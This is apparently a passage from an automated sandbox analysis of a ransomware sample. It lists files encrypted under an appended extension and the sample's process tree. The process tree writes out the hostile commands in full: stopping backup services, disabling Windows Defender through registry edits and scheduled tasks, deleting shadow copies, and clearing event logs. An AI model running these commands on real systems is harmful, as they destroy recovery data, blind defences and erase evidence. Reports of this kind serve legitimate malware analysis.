| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_OrsbQ7oYGzw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\selector.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_UdsIOjMaAKM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-pl.xrm-ms.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_R5jg0NSrpA00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\WideLogo.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectBadgeLogo.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-focus_32.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_ZAIAIMcrQys0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Animation\unlocking-animation-187x169.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_28CaMP9IMzM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_1OW5KVgw_M80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y2Y2zzxCJBs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_j5SVvt6PHv40.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\177.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_bO-IqtT12240.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconEditRichCapture.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\PeopleWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_XabFKKF90ys0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\beeps\uncommon.lua | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\Snooze.scale-80.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_wt0cMuQ9gKk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\TexturedColored.fx | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6536_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_IaofxGLGhGc0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_w_55QkPBUmk0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_hFw4qPprcfw0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchLargeTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-32.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\SkypeAppList.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-32_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\EMLAttachmentIcon.png | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_5VoCNMUwgMM0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12dde" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12dde" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12dde" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
